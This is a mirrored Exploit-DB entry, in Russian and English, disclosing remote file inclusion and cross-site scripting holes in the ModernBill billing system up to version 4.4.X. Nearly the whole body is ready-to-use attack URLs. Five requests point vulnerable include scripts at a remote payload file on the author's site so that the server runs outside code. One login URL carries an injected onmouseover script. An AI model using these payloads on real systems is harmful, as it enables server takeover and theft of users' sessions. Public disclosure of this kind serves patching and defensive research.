- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6916
- Проверка EDB
-
- Пройдено
- Автор
- NIGH7F411
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5060 cve-2008-5059
- Дата публикации
- 2008-10-31
Код:
**************************************************************************************
ModernBill .:. Client Billing System - User Login
ModernBill <= v4.4.X Remote File Inclusion Vulnerability and xss by nigh7f411
http://xc0r3.net/
plezz go to ttp://xc0r3.net/forums/
**************************************************************************************
rfi
http://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt?
xss
http://poop.com/index.php?op=login&submit=submit&submit=submit&[email protected]&[email protected]&new_language="+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit&submit=submit&[email protected]&[email protected]&new_language="+onmouseover=alert(39660.2316362732)+
**************************************************************************************
# milw0rm.com [2008-10-31]
- Источник
- www.exploit-db.com